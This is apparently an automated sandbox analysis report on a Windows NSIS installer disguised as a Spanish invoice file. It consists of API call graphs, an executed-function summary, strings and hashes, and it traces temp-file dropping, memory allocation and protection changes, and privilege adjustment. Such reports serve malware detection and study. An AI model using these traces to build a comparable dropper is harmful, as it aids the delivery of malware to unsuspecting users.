4149->4141 4149->4146 4150 4069e6 WriteFile 4149->4150 4150->4149 4152->4148 4154 405d15 24 API calls 4153->4154 4154->4148 4156->4113 4158 405e13 4157->4158 4159 405e0b GetLastError 4157->4159 4158->4082 4159->4158 4161 4065c0 FindClose 4160->4161 4162 4065cb 4160->4162 4161->4162 4162->4113 4164 406239 4163->4164 4165 40622c 4163->4165 4164->4010 4205 4062e1 4165->4205 4167->4054 4168->4068 4169->4069 4171 40191f lstrcatW 4170->4171 4172 40654e lstrcatW 4170->4172 4171->4068 4172->4171 4174 406b9a 4173->4174 4175 406b8a SetFileAttributesW 4173->4175 4174->4108 4175->4174 4177 406a98 4176->4177 4178 406ae6 4177->4178 4179 406aae MessageBoxIndirectW 4177->4179 4178->4108 4179->4178 4181 4068e3 GetProcAddress 4180->4181 4182 4068d9 4180->4182 4183 4064de 4181->4183 4186 406179 GetSystemDirectoryW 4182->4186 4183->4082 4185 4068df 4185->4181 4185->4183 4187 40619b wsprintfW LoadLibraryExW 4186->4187 4187->4185 4190 4031a2 4189->4190 4190->4141 4190->4142 4190->4143 4192 406923 ReadFile 4191->4192 4193 40312e 4192->4193 4193->4148 4195 406eae 4194->4195 4199 406ea6 4194->4199 4196 406fe9 4195->4196 4197 406fc5 GlobalFree 4195->4197 4198 406fcf GlobalAlloc 4195->4198 4195->4199 4196->4196 4196->4199 4200 407055 GlobalFree 4196->4200 4201 40705c GlobalAlloc 4196->4201 4197->4198 4198->4196 4198->4199 4199->4148 4200->4201 4201->4199 4203 406a07 4202->4203 4203->4148 4204->4136 4206 406311 4205->4206 4207 406337 GetShortPathNameW 4205->4207 4232 4068f6 GetFileAttributesW CreateFileW 4206->4232 4209 406417 4207->4209 4210 40634c 4207->4210 4209->4164 4210->4209 4211 406354 wsprintfA 4210->4211 4213 405e95 17 API calls 4211->4213 4212 40631b CloseHandle GetShortPathNameW 4212->4209 4214 40632f 4212->4214 4215 40637d 4213->4215 4214->4207 4214->4209 4233 4068f6 GetFileAttributesW CreateFileW 4215->4233 4217 40638a 4217->4209 4218 406395 GetFileSize GlobalAlloc 4217->4218 4219 406410 CloseHandle 4218->4219 4220 4063b4 4218->4220 4219->4209 4221 406923 ReadFile 4220->4221 4222 4063bc 4221->4222 4222->4219 4234 406b11 lstrlenA lstrlenA 4222->4234 4225 40641c 4227 406b11 3 API calls 4225->4227 4226 4063cf lstrcpyA 4229 4063e1 4226->4229 4227->4229 4228 4063f2 SetFilePointer 4230 4069e6 WriteFile 4228->4230 4229->4228 4231 406409 GlobalFree 4230->4231 4231->4219 4232->4212 4233->4217 4235 4063cb 4234->4235 4236 406b30 4234->4236 4235->4225 4235->4226 4236->4235 4237 406b5d lstrlenA 4236->4237 4237->4235 4237->4236 5375 401e8e 5376 403002 17 API calls 5375->5376 5377 401e94 IsWindow 5376->5377 5378 401bb2 5377->5378 5379 404f0e 5380 404f32 5379->5380 5381 404f1a 5379->5381 5382 404f66 5380->5382 5383 404f38 SHGetPathFromIDListW 5380->5383 5389 406a15 GetDlgItemTextW 5381->5389 5385 404f48 5383->5385 5386 404f27 SendMessageW 5383->5386 5388 401533 94 API calls 5385->5388 5386->5382 5388->5386 5389->5386 5390 6fa42c6a 5391 6fa42cc3 5390->5391 5392 6fa42ccd GetLastError 5391->5392 5393 6fa42cd8 5391->5393 5392->5393 5394 40211b 5395 40303e 17 API calls 5394->5395 5396 402121 5395->5396 5397 405d15 24 API calls 5396->5397 5398 40212b 5397->5398 5399 4066b1 2 API calls 5398->5399 5400 402131 5399->5400 5401 40215b 5400->5401 5403 4064ef 5 API calls 5400->5403 5404 401709 5400->5404 5402 402110 CloseHandle 5401->5402 5401->5404 5402->5404 5405 40214b 5403->5405 5405->5401 5407 4065fa wsprintfW 5405->5407 5407->5401 4714 40291d 4715 403002 17 API calls 4714->4715 4725 40292e 4715->4725 4716 402aee 4717 402aa2 SetFilePointer 4719 402980 ReadFile 4719->4717 4719->4725 4720 402a3d 4720->4717 4720->4725 4728 40645f SetFilePointer 4720->4728 4721 406923 ReadFile 4721->4725 4722 402ae4 4737 4065fa wsprintfW 4722->4737 4723 4029c5 MultiByteToWideChar 4723->4725 4725->4716 4725->4717 4725->4719 4725->4720 4725->4721 4725->4722 4725->4723 4727 4029f6 SetFilePointer MultiByteToWideChar 4725->4727 4727->4725 4729 40647b 4728->4729 4732 406496 4728->4732 4730 406923 ReadFile 4729->4730 4731 406487 4730->4731 4731->4732 4733 4064c7 SetFilePointer 4731->4733 4734 40649f SetFilePointer 4731->4734 4732->4720 4733->4732 4734->4733 4735 4064aa 4734->4735 4736 4069e6 WriteFile 4735->4736 4736->4732 4737->4716 5408 40219d 5409 40303e 17 API calls 5408->5409 5410 4021a4 5409->5410 5411 4068c1 5 API calls 5410->5411 5412 4021b5 5411->5412 5413 402ea5 5412->5413 5414 4021ce GlobalAlloc 5412->5414 5414->5413 5415 4021e3 5414->5415 5416 4068c1 5 API calls 5415->5416 5417 4021ea 5416->5417 5418 4068c1 5 API calls 5417->5418 5420 4021f3 5418->5420 5419 40224e GlobalFree 5419->5413 5420->5419 5425 4065fa wsprintfW 5420->5425 5422 402237 5426 4065fa wsprintfW 5422->5426 5424 40224c 5424->5419 5425->5422 5426->5424 4738 6fa4167a 4739 6fa416b7 4738->4739 4780 6fa42351 4739->4780 4741 6fa416be 4742 6fa417ef 4741->4742 4743 6fa416d6 4741->4743 4744 6fa416cf 4741->4744 4810 6fa42049 4743->4810 4826 6fa41fcb 4744->4826 4749 6fa41700 4750 6fa41740 4749->4750 4751 6fa41722 4749->4751 4756 6fa41746 4750->4756 4757 6fa41791 4750->4757 4839 6fa42209 4751->4839 4752 6fa4170a 4752->4749 4836 6fa42f9f 4752->4836 4753 6fa416eb 4755 6fa416f5 4753->4755 4759 6fa41702 4753->4759 4755->4749 4820 6fa42d14 4755->4820 4858 6fa41f1e 4756->4858 4763 6fa42209 10 API calls 4757->4763 4758 6fa41728 4850 6fa41668 4758->4850 4830 6fa417f7 4759->4830 4764 6fa4177e 4763->4764 4771 6fa417de 4764->4771 4863 6fa4200d 4764->4863 4769 6fa41708 4769->4749 4770 6fa42209 10 API calls 4770->4764 4771->4742 4775 6fa417e8 GlobalFree 4771->4775 4775->4742 4777 6fa417cf 4777->4771 4867 6fa415c5 wsprintfW 4777->4867 4778 6fa417c2 FreeLibrary 4778->4777 4870 6fa412f8 GlobalAlloc 4780->4870 4782 6fa4237f 4871 6fa412f8 GlobalAlloc 4782->4871 4784 6fa42a3a GlobalFree GlobalFree GlobalFree 4785 6fa42a5a 4784->4785 4799 6fa42aa7 4784->4799 4786 6fa42af7 4785->4786 4791 6fa42a73 4785->4791 4785->4799 4788 6fa42b19 GetModuleHandleW 4786->4788 4786->4799 4787 6fa42947 GlobalAlloc 4805 6fa4238a 4787->4805 4789 6fa42b3f 4788->4789 4790 6fa42b2a LoadLibraryW 4788->4790 4878 6fa41f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4789->4878 4790->4789 4790->4799 4796 6fa412e1 2 API calls 4791->4796 4791->4799 4793 6fa4299f lstrcpyW 4793->4805 4794 6fa429bd GlobalFree 4794->4805 4795 6fa42b8e 4798 6fa42b9c lstrlenW 4795->4798 4795->4799 4796->4799 4797 6fa429af lstrcpyW 4797->4805 4879 6fa41f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4798->4879 4799->4741 4800 6fa42b4c 4800->4795 4808 6fa42b78 GetProcAddress 4800->4808 4802 6fa42bb6 4802->4799 4804 6fa42822 GlobalFree 4804->4805 4805->4784 4805->4787 4805->4793 4805->4794 4805->4797 4805->4804 4807 6fa429fb 4805->4807 4872 6fa412f8 GlobalAlloc 4805->4872 4873 6fa412e1 4805->4873 4807->4805 4876 6fa41309 GlobalSize GlobalAlloc 4807->4876 4808->4795 4811 6fa4205e 4810->4811 4812 6fa4208b 4811->4812 4814 6fa42124 GlobalAlloc WideCharToMultiByte 4811->4814 4815 6fa42154 GlobalAlloc CLSIDFromString 4811->4815 4816 6fa421be GlobalFree 4811->4816 4818 6fa412e1 lstrcpynW GlobalAlloc 4811->4818 4812->4811 4812->4816 4881 6fa41548 4812->4881 4886 6fa419db 4812->4886 4814->4816 4815->4811 4816->4811 4817 6fa416dc 4816->4817 4817->4749 4817->4752 4817->4753 4818->4811 4822 6fa42d26 4820->4822 4821 6fa42dcb VirtualAlloc 4825 6fa42de9 4821->4825 4822->4821 4889 6fa42cbf 4825->4889 4827 6fa41fde 4826->4827 4828 6fa41fe9 GlobalAlloc 4827->4828 4829 6fa416d5 4827->4829 4828->4827 4829->4743 4834 6fa41823 4830->4834 4831 6fa41897 GlobalAlloc 4835 6fa418b5 4831->4835 4832 6fa418a8 4833 6fa418ac GlobalSize 4832->4833 4832->4835 4833->4835 4834->4831 4834->4832 4835->4769 4837 6fa42faa 4836->4837 4838 6fa42fea GlobalFree 4837->4838 4892 6fa412f8 GlobalAlloc 4839->4892 4841 6fa422a6 StringFromGUID2 4847 6fa42211 4841->4847 4842 6fa422b7 lstrcpynW 4842->4847 4843 6fa42280 MultiByteToWideChar 4843->4847 4844 6fa422ca wsprintfW 4844->4847 4845 6fa422ee GlobalFree 4845->4847 4846 6fa42325 GlobalFree 4846->4758 4847->4841 4847->4842 4847->4843 4847->4844 4847->4845 4847->4846 4848 6fa415eb 2 API calls 4847->4848 4893 6fa41638 4847->4893 4848->4847 4897 6fa412f8 GlobalAlloc 4850->4897 4852 6fa4166d 4853 6fa41f1e 2 API calls 4852->4853 4854 6fa41677 4853->4854 4855 6fa415eb 4854->4855 4856 6fa415f4 GlobalAlloc lstrcpynW 4855->4856 4857 6fa41633 GlobalFree 4855->4857 4856->4857 4857->4764 4859 6fa41f5c lstrcpyW 4858->4859 4862 6fa41f2b wsprintfW 4858->4862 4860 6fa41765 4859->4860 4860->4770 4862->4860 4864 6fa4201c 4863->4864 4866 6fa417a4 4863->4866 4865 6fa42033 GlobalFree 4864->4865 4864->4866 4865->4864 4866->4777 4866->4778 4868 6fa415eb 2 API calls 4867->4868 4869 6fa415e6 4868->4869 4869->4771 4870->4782 4871->4805 4872->4805 4880 6fa412f8 GlobalAlloc 4873->4880 4875 6fa412f0 lstrcpynW 4875->4805 4877 6fa41327 4876->4877 4877->4807 4878->4800 4879->4802 4880->4875 4882 6fa41555 4881->4882 4883 6fa412f8 GlobalAlloc 4881->4883 4884 6fa412e1 2 API calls 4882->4884 4883->4812 4885 6fa4156a 4884->4885 4885->4812 4887 6fa41a48 4886->4887 4888 6fa419ea VirtualAlloc 4886->4888 4887->4812 4888->4887 4890 6fa42ccd GetLastError 4889->4890 4891 6fa42cd8 4889->4891 4890->4891 4891->4749 4892->4847 4894 6fa41663 4893->4894 4895 6fa4163f 4893->4895 4894->4847 4895->4894 4896 6fa41648 lstrcpyW 4895->4896 4896->4894 4897->4852 5427 401aa1 5428 401aa2 5427->5428 5429 40303e 17 API calls 5428->5429 5430 401aa7 5429->5430 5431 4066f4 66 API calls 5430->5431 5432 401ab1 5431->5432 5433 6fa412c6 5434 6fa4101b 5 API calls 5433->5434 5435 6fa412df 5434->5435 5436 403d23 5437 403d2e 5436->5437 5438 403d32 5437->5438 5439 403d35 GlobalAlloc 5437->5439 5439->5438 5440 6fa410c7 5441 6fa410f8 5440->5441 5442 6fa412be GlobalFree 5441->5442 5443 6fa411d7 GlobalAlloc 5441->5443 5444 6fa41258 GlobalFree 5441->5444 5445 6fa41548 3 API calls 5441->5445 5446 6fa412ba 5441->5446 5447 6fa41296 GlobalFree 5441->5447 5448 6fa415eb 2 API calls 5441->5448 5449 6fa41638 lstrcpyW 5441->5449 5451 6fa41165 GlobalAlloc 5441->5451 5443->5441 5444->5441 5445->5441 5446->5442 5447->5441 5450 6fa411ca GlobalFree 5448->5450 5452 6fa411ab GlobalFree 5449->5452 5450->5441 5451->5441 5452->5441 5453 6fa41cc7 5454 6fa41cee 5453->5454 5455 6fa41d2f GlobalFree 5454->5455 5456 6fa41d4e __alldvrm 5454->5456 5455->5456 5457 6fa415eb 2 API calls 5456->5457 5458 6fa41de5 GlobalFree GlobalFree 5457->5458 5459 402ba3 5460 40303e 17 API calls 5459->5460 5461 402bb2 5460->5461 5462 402bc9 5461->5462 5463 40303e 17 API calls 5461->5463 5464 406b78 2 API calls 5462->5464 5463->5462 5465 402bcf 5464->5465 5487 4068f6 GetFileAttributesW CreateFileW 5465->5487 5467 402bdc 5468 402cb7 5467->5468 5469 402c9f 5467->5469 5470 402bfd GlobalAlloc 5467->5470 5471 402cc0 DeleteFileW 5468->5471 5472 402ccf 5468->5472 5474 403148 35 API calls 5469->5474 5470->5469 5473 402c1d 5470->5473 5471->5472 5488 403131 SetFilePointer 5473->5488 5476 402cac CloseHandle 5474->5476 5476->5468 5477 402c23 5478 40311b ReadFile 5477->5478 5479 402c2d GlobalAlloc 5478->5479 5480 402c43 5479->5480 5481 402c84 5479->5481 5483 403148 35 API calls 5480->5483 5482 4069e6 WriteFile 5481->5482 5484 402c93 GlobalFree 5482->5484 5486 402c52 5483->5486 5484->5469 5485 402c7a GlobalFree 5485->5481 5486->5485 5487->5467 5488->5477 3874 402728 3885 4030c1 3874->3885 3879 402748 RegQueryValueExW 3880 402772 3879->3880 3881 40276b 3879->3881 3882 40271c RegCloseKey 3880->3882 3883 401709 3880->3883 3881->3880 3895 4065fa wsprintfW 3881->3895 3882->3883 3886 40303e 17 API calls 3885->3886 3887 4030d9 3886->3887 3888 4062b3 RegOpenKeyExW 3887->3888 3889 402732 3888->3889 3890 40303e 3889->3890 3891 405e95 17 API calls 3890->3891 3892 403067 3891->3892 3893 40273b 3892->3893 3896 406d18 3892->3896 3893->3879 3893->3883 3895->3880 3903 406d2d 3896->3903 3897 406daf 3898 406db7 CharPrevW 3897->3898 3901 406dd7 3897->3901 3898->3897 3899 406da0 CharNextW 3899->3897 3899->3903 3901->3893 3902 406d8c CharNextW 3902->3903 3903->3897 3903->3899 3903->3902 3904 406d9b CharNextW 3903->3904 3905 4065d1 3903->3905 3904->3899 3906 4065f7 3905->3906 3907 4065dd 3905->3907 3906->3903 3907->3906 3908 4065e6 CharNextW 3907->3908 3908->3906 3908->3907 5489 402b28 5490 402b2e 5489->5490 5491 402b36 FindClose 5490->5491 5492 402ea1 5490->5492 5491->5492 5493 40362a 5494 403650 5493->5494 5495 40363c SetTimer 5493->5495 5496 403659 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5494->5496 5497 4036a7 5494->5497 5495->5496 5496->5497 5498 4058ab 5499 4058c0 5498->5499 5500 4058d4 5498->5500 5502 4058c6 5499->5502 5503 405919 CallWindowProcW 5499->5503 5501 4058dc IsWindowVisible 5500->5501 5507 4058f3 5500->5507 5501->5503 5504 4058e9 5501->5504 5505 4054c3 SendMessageW 5502->5505 5508 4058d0 5503->5508 5506 4056b5 5 API calls 5504->5506 5505->5508 5506->5507 5507->5503 5509 405491 94 API calls 5507->5509 5509->5503 5510 4025ac 5511 40303e 17 API calls 5510->5511 5512 4025bd 5511->5512 5513 40303e 17 API calls 5512->5513 5514 4025c6 5513->5514 5515 40303e 17 API calls 5514->5515 5516 4025cf GetPrivateProfileStringW 5515->5516 5517 4025f4 5516->5517 5518 401ead 5519 403002 17 API calls 5518->5519 5520 401eb4 5519->5520 5521 403002 17 API calls 5520->5521 5522 401ebd GetDlgItem 5521->5522 4317 6fa41a4a 4318 6fa41aa1 4317->4318 4319 6fa41a5a VirtualProtect 4317->4319 4319->4318 4336 4027b0 4337 4030c1 17 API calls 4336->4337 4338 4027ba 4337->4338 4339 403002 17 API calls 4338->4339 4340 4027c3 4339->4340 4341 4027d5 4340->4341 4345 401709 4340->4345 4342 4027f0 RegEnumValueW 4341->4342 4343 4027e4 RegEnumKeyW 4341->4343 4344 40280e RegCloseKey 4342->4344 4343->4344 4344->4345 5523 405630 lstrcpynW lstrlenW 5524 401ab6 5525 40303e 17 API calls 5524->5525 5526 401abd 5525->5526 5527 406a83 MessageBoxIndirectW 5526->5527 5528 401709 5527->5528 5529 402837 5530 40303e 17 API calls 5529->5530 5532 401afd 5530->5532 5532->5529 5533 402855 5532->5533 5534 4068f6 GetFileAttributesW CreateFileW 5532->5534 5534->5532 5535 401fb8 GetDC 5536 403002 17 API calls 5535->5536 5537 401fc8 GetDeviceCaps MulDiv ReleaseDC 5536->5537 5538 403002 17 API calls 5537->5538 5539 401ff8 5538->5539 5540 405e95 17 API calls 5539->5540 5541 402032 CreateFontIndirectW 5540->5541 5542 401dba 5543 403002 17 API calls 5542->5543 5544 401dc1 5543->5544 5545 403002 17 API calls 5544->5545 5546 401dce 5545->5546 5548 401de1 5546->5548 5549 40303e 17 API calls 5546->5549 5547 401df6 5551 401e50 5547->5551 5552 401e01 5547->5552 5548->5547 5550 40303e 17 API calls 5548->5550 5549->5548 5550->5547 5554 40303e 17 API calls 5551->5554 5553 403002 17 API calls 5552->5553 5555 401e06 5553->5555 5556 401e55 5554->5556 5557 403002 17 API calls 5555->5557 5558 40303e 17 API calls 5556->5558 5559 401e11 5557->5559 5560 401e5e FindWindowExW 5558->5560 5561 401e41 SendMessageW 5559->5561 5562 401e1e SendMessageTimeoutW 5559->5562 5563 401e7b 5560->5563 5561->5563 5562->5563 5564 401bbb 5565 40303e 17 API calls 5564->5565 5566 401bc4 ExpandEnvironmentStringsW 5565->5566 5567 401bd7 5566->5567 5569 401be9 5566->5569 5568 401bdd lstrcmpW 5567->5568 5567->5569 5568->5569

                                Executed Functions

                                Function 004036D7 Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 416stringfilecomCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 4036d7-403720 SetErrorMode GetVersionExW 1 403722-403742 GetVersionExW 0->1 2 403759 0->2 4 403744-403748 1->4 5 403755-403757 1->5 3 403760-403765 2->3 7 403772 3->7 8 403767-403770 3->8 6 40374b-403753 4->6 5->6 6->3 9 403776-4037b8 7->9 8->9 10 4037ba-4037c2 call 4068c1 9->10 11 4037cb 9->11 10->11 16 4037c4 10->16 13 4037d0-4037e2 call 406179 lstrlenA 11->13 18 4037e4-403800 call 4068c1 * 3 13->18 16->11 25 403811-4038aa #17 OleInitialize SHGetFileInfoW call 406af5 GetCommandLineW call 406af5 call 4065d1 CharNextW 18->25 26 403802-403808 18->26 35 4038b0 25->35 36 403985-40399f GetTempPathW call 403c80 25->36 26->25 30 40380a 26->30 30->25 37 4038b2-4038b8 35->37 44 4039a1-4039bf GetWindowsDirectoryW lstrcatW call 403c80 36->44 45 4039f7-403a10 DeleteFileW call 4033c8 36->45 39 4038c5-4038d0 37->39 40 4038ba-4038c3 37->40 42 4038d2-4038d9 39->42 43 4038db-4038ea 39->43 40->39 40->40 42->43 47 403945-403959 call 4065d1 43->47 48 4038ec-4038f8 43->48 44->45 55 4039c1-4039f1 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403c80 44->55 57 403bc1 45->57 58 403a16-403a1c 45->58 65 403961-403967 47->65 66 40395b-40395e 47->66 53 403912-403918 48->53 54 4038fa-403901 48->54 61 403934-40393b 53->61 62 40391a-403921 53->62 59 403903-403906 54->59 60 403908 54->60 55->45 80 403bbf 55->80 69 403bc5-403bd2 call 4036ad OleUninitialize 57->69 67 403a81-403a88 call 405a19 58->67 68 403a1e-403a30 call 4065d1 58->68 59->53 59->60 60->53 61->47 64 40393d-403943 61->64 62->61 70 403923-40392a 62->70 64->47 72 403971-403980 call 406af5 64->72 65->36 73 403969-40396c 65->73 66->65 82 403a8d-403a8f 67->82 86 403a46-403a48 68->86 84 403bd4-403bdf call 406a83 69->84 85 403be7-403bee 69->85 77 403931 70->77 78 40392c-40392f 70->78 72->36 73->37 77->61 78->61 78->77 80->57 82->69 94 403be1 ExitProcess 84->94 88 403bf0-403c06 GetCurrentProcess OpenProcessToken 85->88 89 403c6c-403c7b 85->89 90 403a32-403a38 86->90 91 403a4a-403a51 86->91 96 403c08-403c36 LookupPrivilegeValueW AdjustTokenPrivileges 88->96 97 403c3c-403c4a call 4068c1 88->97 89->94 98 403a43 90->98 99 403a3a-403a41 90->99 92 403a53-403a63 call 406613 91->92 93 403a94-403aac call 4064d7 lstrcatW 91->93 106 403a69-403a7f call 406af5 * 2 92->106 107 403bbb-403bbd 92->107 110 403abd-403ade lstrcatW lstrcmpiW 93->110 111 403aae-403ab8 lstrcatW 93->111 96->97 108 403c58-403c63 ExitWindowsEx 97->108 109 403c4c-403c56 97->109 98->86 99->91 99->98 106->67 107->69 108->89 114 403c65-403c67 call 401533 108->114 109->108 109->114 110->107 112 403ae4-403aeb 110->112 111->110 116 403af4 call 405df9 112->116 117 403aed-403af2 call 405e19 112->117 114->89 124 403af9-403b0b SetCurrentDirectoryW 116->124 117->124 126 403b1c-403b36 call 406af5 124->126 127 403b0d-403b17 call 406af5 124->127 131 403b37-403b55 call 405e95 DeleteFileW 126->131 127->126 134 403ba4-403bae 131->134 135 403b57-403b6b CopyFileW 131->135 134->131 137 403bb0-403bb6 call 406218 134->137 135->134 136 403b6d-403b99 call 406218 call 405e95 call 4066b1 135->136 136->134 145 403b9b-403ba2 CloseHandle 136->145 137->107 145->134
                                APIs
                                • SetErrorMode.KERNELBASE(00008001), ref: 004036F3
                                • GetVersionExW.KERNEL32 ref: 0040371C
                                • GetVersionExW.KERNEL32(?), ref: 0040372F
                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037D7
                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403811
                                • OleInitialize.OLE32(00000000), ref: 00403818
                                • SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 00403837
                                • GetCommandLineW.KERNEL32(Tolkningen Setup,NSIS Error), ref: 0040384C
                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",?,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000), ref: 00403898
                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403996
                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039A7
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039B3
                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039C7
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039CF
                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E0
                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                • DeleteFileW.KERNELBASE(1033), ref: 00403A02
                                  • Part of subcall function 004033C8: GetTickCount.KERNEL32 ref: 004033DB
                                  • Part of subcall function 004033C8: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,00000400,?,?,?,?,?), ref: 004033F7
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AA5
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408600,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AB8
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AC7
                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AD6
                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AFE
                                • DeleteFileW.KERNEL32(004209C0,004209C0,?,0042A000,?), ref: 00403B51
                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,004209C0,?), ref: 00403B63
                                • CloseHandle.KERNEL32(00000000,004209C0,004209C0,?,004209C0,00000000), ref: 00403B9C
                                  • Part of subcall function 00405DF9: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00405E01
                                  • Part of subcall function 00405DF9: GetLastError.KERNEL32 ref: 00405E0B
                                • OleUninitialize.OLE32(00000000), ref: 00403BCA
                                • ExitProcess.KERNEL32 ref: 00403BE1
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BF7
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403BFE
                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C13
                                • AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00403C36
                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5B
                                  • Part of subcall function 004065D1: CharNextW.USER32(?,00403897,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",?,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000), ref: 004065E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                • String ID: "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\fanin$C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Tolkningen Setup$UXTHEME$\Temp$~nsu
                                • API String ID: 1152188737-768733493
                                • Opcode ID: 8cd5672f1bbfe50c95fd09064464ed4eca0056383847438df08223233b51ff5d
                                • Instruction ID: 07a9971b8f29bbd68b878d9119023e68a6b74827d1d77f0d98df9434206269f1
                                • Opcode Fuzzy Hash: 8cd5672f1bbfe50c95fd09064464ed4eca0056383847438df08223233b51ff5d
                                • Instruction Fuzzy Hash: 4FD137712043116AD7207F619D46B6B3AACAB4574AF51443FF582B62D2DBBC8E408B2E
                                Function 00404B0B Relevance: 54.3, APIs: 36, Instructions: 295windowclipboardmemoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
